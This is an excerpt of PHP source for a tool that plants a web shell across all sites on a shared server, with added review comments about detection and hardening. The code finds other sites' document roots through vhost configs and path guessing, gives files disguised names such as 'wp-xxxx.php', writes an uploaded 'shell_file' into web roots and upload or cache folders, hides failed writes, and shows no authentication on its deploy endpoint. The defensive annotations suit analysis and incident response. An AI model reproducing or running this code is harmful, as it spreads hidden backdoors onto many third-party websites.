3; }); return array_values($domains); }
// NOTE(review): the line above closes a function that begins before this excerpt. It is
// presumably get_domains(), which the request handler at the bottom calls; confirm against
// the full file.

/**
 * Builds the file name used for a dropped file.
 *
 * Picks one of the 20 templates below at random and substitutes an 8-character
 * lowercase-hex id for %s. The id is the first 8 hex characters of an MD5 over
 * mt_rand(), time() and uniqid(); it only serves to make the name unique.
 *
 * Review note (detection): the result always has the shape "<prefix>-<8 hex>.php",
 * with the prefix taken from this fixed list, so a web-root scan or file-integrity
 * monitor can match on that shape. The prefixes resemble ordinary include/plugin
 * file names, so a name-based allow-list alone will not single these files out.
 *
 * @return string File name only, with no directory part.
 */
function generate_random_filename() {
    $safe_patterns = [
        'class-%s.php', 'helper-%s.php', 'util-%s.php', 'module-%s.php', 'include-%s.php',
        'lib-%s.php', 'func-%s.php', 'data-%s.php', 'api-%s.php', 'ajax-%s.php',
        'common-%s.php', 'core-%s.php', 'base-%s.php', 'wp-%s.php', 'admin-%s.php',
        'template-%s.php', 'page-%s.php', 'form-%s.php', 'cache-%s.php', 'session-%s.php'
    ];
    $random_id = substr(md5(mt_rand() . time() . uniqid()), 0, 8);
    $pattern = $safe_patterns[array_rand($safe_patterns)];
    return sprintf($pattern, $random_id);
}

/**
 * Collects candidate directories on the local filesystem for one domain name.
 *
 * Three sources are consulted in order:
 *   1. web-server vhost configuration files that mention the domain,
 *   2. a fixed list of web roots combined with spelling variants of the domain
 *      and common document-root subdirectory names,
 *   3. per-user public_html directories that contain a directory named after
 *      the domain.
 * Duplicates are removed. If any candidate is writable, only the writable ones
 * are returned; otherwise the full candidate list is returned.
 *
 * Review note (hardening): every step depends on the PHP process being able to
 * read server configuration and to list or write directories that belong to
 * other sites. Running each site under its own OS user, keeping vhost configs
 * unreadable to the web-server user, and setting a per-site open_basedir remove
 * that access.
 *
 * @param string $domain Domain name to look up (string type assumed from the
 *                       string functions applied to it).
 * @return array List of directory paths; may be empty.
 */
function find_domain_paths($domain) {
    $domain_paths = [];
    $web_roots = [
        $_SERVER['DOCUMENT_ROOT'] ?? '', '/var/www', '/var/www/html', '/var/www/vhosts', '/var/www/sites', '/home',
        '/usr/local/www', '/usr/local/httpd', '/usr/local/apache', '/usr/local/apache2', '/usr/local/nginx',
        '/usr/share/nginx', '/usr/share/httpd', '/srv/www', '/srv/http', '/srv/httpd', '/srv/sites',
        '/opt/lampp/htdocs', '/opt/xampp/htdocs'
    ];
    // Spelling variants under which a site directory might be named.
    $domain_clean = str_replace(['www.', '.'], ['', '_'], $domain);
    $domain_parts = explode('.', $domain);
    $domain_base = $domain_parts[0];
    $domain_variants = [ $domain, 'www.' . $domain, str_replace('www.', '', $domain), $domain_clean, $domain_base ];
    $server_configs = [
        '/etc/apache2/sites-enabled/*.conf', '/etc/apache2/sites-available/*.conf',
        '/etc/httpd/conf.d/*.conf', '/etc/httpd/vhosts.d/*.conf',
        '/etc/nginx/sites-enabled/*', '/etc/nginx/conf.d/*.conf',
        '/usr/local/etc/apache*/extra/httpd-vhosts.conf', '/usr/local/etc/nginx/sites-enabled/*'
    ];
    // Source 1: vhost configuration files.
    foreach ($server_configs as $pattern) {
        $configs = glob($pattern);
        if ($configs) {
            foreach ($configs as $config) {
                // The @ operator suppresses the warning for an unreadable file, so a denied
                // read leaves no entry in the PHP error log.
                $content = @file_get_contents($config);
                if ($content && stripos($content, $domain) !== false) {
                    $doc_pattern = '/(?:DocumentRoot|root)\s+[\'"]?([^\'"\s;]+)[\'"]?/i';
                    // preg_match() returns the first DocumentRoot/root directive in the file,
                    // whichever server block it belongs to.
                    if (preg_match($doc_pattern, $content, $doc_match)) {
                        $path = $doc_match[1];
                        // From this source only directories that are already writable are kept.
                        if (is_dir($path) && is_writable($path)) {
                            $domain_paths[] = $path;
                        }
                    }
                }
            }
        }
    }
    // Source 2: fixed web roots x domain variants, plus common docroot subdirectories.
    // Directories are recorded here whether or not they are writable; the filter is at the end.
    foreach ($web_roots as $root) {
        if (empty($root) || !is_dir($root) || !is_readable($root)) continue;
        foreach ($domain_variants as $variant) {
            $path = "$root/$variant";
            if (is_dir($path)) {
                $domain_paths[] = $path;
                $subdirs = ['public_html', 'httpdocs', 'www', 'public', 'web', 'htdocs'];
                foreach ($subdirs as $subdir) {
                    $subpath = "$path/$subdir";
                    if (is_dir($subpath)) {
                        $domain_paths[] = $subpath;
                    }
                }
            }
        }
    }
    // Source 3: a directory named after the domain inside any user's public_html.
    $cpanel_patterns = [ "/home/*/public_html", ];
    foreach ($cpanel_patterns as $pattern) {
        $matching_paths = glob($pattern, GLOB_ONLYDIR);
        foreach ($matching_paths as $path) {
            $domain_dir = $path . '/' . $domain;
            if (is_dir($domain_dir)) {
                $domain_paths[] = $domain_dir;
            }
        }
    }
    $domain_paths = array_unique($domain_paths);
    $writable_paths = [];
    foreach ($domain_paths as $path) {
        if (is_writable($path)) {
            $writable_paths[] = $path;
        }
    }
    // Prefer writable candidates; fall back to every candidate when none is writable.
    return !empty($writable_paths) ? $writable_paths : $domain_paths;
}

/**
 * For each domain, writes $content under a newly generated file name into the
 * first candidate location that accepts the write, and reports the outcome.
 *
 * Each candidate directory from find_domain_paths() is tried directly first,
 * then a fixed list of subdirectories that are commonly writable (uploads,
 * cache, tmp, logs and similar). A write counts as successful when the file
 * exists afterwards with a size greater than zero. The reported URL is
 * assembled from the domain and file name; it is never requested, so "success"
 * says nothing about whether the file is reachable over HTTP.
 *
 * A single 30-second budget ($max_time) is shared by all domains; domains
 * reached after it expires are reported as "skipped".
 *
 * Review note (detection and mitigation): a successful run leaves one new .php
 * file per domain, created by the web-server user, either in a document root
 * or in one of the listed upload/cache/log subdirectories. Denying PHP
 * execution in those subdirectories and alerting on .php file creation there
 * covers the fallback locations. Write failures are hidden by the @ operator,
 * so the PHP error log is not a reliable record of attempts.
 *
 * @param array  $domains Domain names to process (presumably the output of
 *                        get_domains(), which is outside this excerpt).
 * @param string $content Bytes to write into each file.
 * @return array One result array per domain with "domain" and "status" keys
 *               plus path/url/filename, error or reason; or a single
 *               ["error" => ...] array when $content is empty.
 */
function deploy_to_domains($domains, $content) {
    $results = [];
    if (empty($content)) {
        return [ "error" => "No content provided for deployment" ];
    }
    $max_time = 30;
    $start_time = time();
    foreach ($domains as $domain) {
        // The time budget is measured from the start of the whole run, not per domain.
        if (time() - $start_time > $max_time) {
            $results[] = ["domain" => $domain, "status" => "skipped", "reason" => "Time limit exceeded"];
            continue;
        }
        $success = false;
        $deployed_path = "";
        $deployed_url = "";
        // One file name per domain, reused for every location tried for that domain.
        $shell_name = generate_random_filename();
        $domain_paths = find_domain_paths($domain);
        if (empty($domain_paths)) {
            $results[] = [ "domain" => $domain, "status" => "failed", "error" => "No valid paths found for this domain" ];
            continue;
        }
        foreach ($domain_paths as $base_path) {
            if (time() - $start_time > $max_time) {
                break;
            }
            // First attempt: the candidate directory itself.
            $shell_path = $base_path . '/' . $shell_name;
            if (@file_put_contents($shell_path, $content)) {
                if (file_exists($shell_path) && filesize($shell_path) > 0) {
                    $success = true;
                    $deployed_path = $shell_path;
                    $deployed_url = 'http://' . $domain . '/' . $shell_name;
                    break;
                }
            }
            // Fallback: subdirectories that applications usually leave writable for the
            // web-server user. These are the directories where PHP execution should be
            // disabled by server configuration.
            $common_writeable_dirs = [
                'wp-content/uploads', 'wp-content/themes', 'wp-content', 'images', 'img', 'uploads', 'media',
                'files', 'cache', 'tmp', 'temp', 'assets', 'data', 'logs'
            ];
            foreach ($common_writeable_dirs as $subdir) {
                $dir_path = $base_path . '/' . $subdir;
                if (is_dir($dir_path) && is_writable($dir_path)) {
                    $shell_path = $dir_path . '/' . $shell_name;
                    if (@file_put_contents($shell_path, $content)) {
                        if (file_exists($shell_path) && filesize($shell_path) > 0) {
                            $success = true;
                            $deployed_path = $shell_path;
                            $deployed_url = 'http://' . $domain . '/' . $subdir . '/' . $shell_name;
                            // Leaves both the subdirectory loop and the candidate-path loop.
                            break 2;
                        }
                    }
                }
            }
        }
        if ($success) {
            $results[] = [ "domain" => $domain, "status" => "success", "path" => $deployed_path, "url" => $deployed_url, "filename" => $shell_name ];
        } else {
            $results[] = [ "domain" => $domain, "status" => "failed", "error" => "No writable directory found or access denied" ];
        }
    }
    return $results;
}

// Request entry point. The GET parameter api=deploy selects this branch; only a POST that
// carries a multipart file field named "shell_file" is acted on. The uploaded bytes are
// handed unchanged to deploy_to_domains() for every domain returned by get_domains().
// NOTE(review): no authentication or authorization check appears between the parameter test
// and the deployment call in this excerpt. Whether an earlier part of the file gates access
// cannot be told from here.
// Review note (detection): in access logs this shows up as a POST to this script with query
// string api=deploy and a multipart body. The JSON response lists every path and URL written,
// so captured responses give incident responders the list of files to remove.
if (isset($_GET['api']) && $_GET['api'] === 'deploy') {
    header('Content-Type: application/json');
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        if (isset($_FILES['shell_file']) && $_FILES['shell_file']['error'] === UPLOAD_ERR_OK) {
            $shell_content = file_get_contents($_FILES['shell_file']['tmp_name']);
            if (!empty($shell_content)) {
                $domains = get_domains();
                if (!empty($domains)) {
                    $results = deploy_to_domains($domains, $shell_content);
                    echo json_encode(['status' => 'success', 'results' => $results]);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'No domains found on this server']);
                }
            } else {
                echo json_encode(['status' => 'error', 'message' => 'Failed to read uploaded file']);
            }
        } else {
            echo json_encode(['status' => 'error', 'message' => 'Please upload a valid shell file']);
        }
    } else {
        echo json_encode(['status' => 'error', 'message' => 'Method not allowed']);
    }
    // Always terminates the request once the api=deploy branch has been entered.
    exit;
}
?>